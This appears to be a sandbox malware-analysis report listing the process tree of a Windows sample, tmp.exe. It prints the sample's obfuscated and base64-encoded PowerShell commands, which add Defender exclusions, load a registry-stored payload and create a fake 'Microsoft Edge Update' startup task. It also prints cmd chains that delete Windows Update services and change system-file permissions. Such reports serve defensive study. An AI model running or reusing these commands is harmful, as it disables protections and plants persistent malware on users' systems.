- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGkAawBxAHcAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAGQAZwBlAFUAcABkAGEAdABlAHIAXABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBqAHoAYwBqACMAPgA="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "luchktlmnebwz"4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZABlACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEcAawBBAGEAdwBCAHgAQQBIAGMAQQBJAHcAQQArAEEAQwBBAEEAVQB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAGcAQQBDADAAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAUQBBAEcARQBBAGQAQQBCAG8AQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAUQBBAEgASQBBAGIAdwBCAG4AQQBIAEkAQQBZAFEAQgB0AEEAQwBBAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBCAHoAQQBGAHcAQQBUAFEAQgBwAEEARwBNAEEAYwBnAEIAdgBBAEgATQBBAGIAdwBCAG0AQQBIAFEAQQBYAEEAQgBGAEEARwBRAEEAWgB3AEIAbABBAEYAVQBBAGMAQQBCAGsAQQBHAEUAQQBkAEEAQgBsAEEASABJAEEAWABBAEIATgBBAEcAawBBAFkAdwBCAHkAQQBHADgAQQBjAHcAQgB2AEEARwBZAEEAZABBAEIARgBBAEcAUQBBAFoAdwBCAGwAQQBGAFUAQQBjAEEAQgBrAEEARwBFAEEAZABBAEIAbABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwAwAEEAVgBnAEIAbABBAEgASQBBAFkAZwBBAGcAQQBGAEkAQQBkAFEAQgB1AEEARQBFAEEAYwB3AEEAZwBBAEQAdwBBAEkAdwBCAHEAQQBIAG8AQQBZAHcAQgBxAEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBzAG0AYQBsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcwBmAHoAaQAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGIAdQBhAHkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAFUAcABkAGEAdABlACAAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBwAHIAcwAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAGQAZwBlAFUAcABkAGEAdABlAHIAXABNAGkAYwByAG8AcwBvAGYAdABFAGQAZwBlAFUAcABkAGEAdABlAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBzAGEAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHkAeAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAAVQBwAGQAYQB0AGUAIAAnADsA"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3296 -s 6722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4404 -s 8282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 4404 -ip 44042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 3296 -ip 32962⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
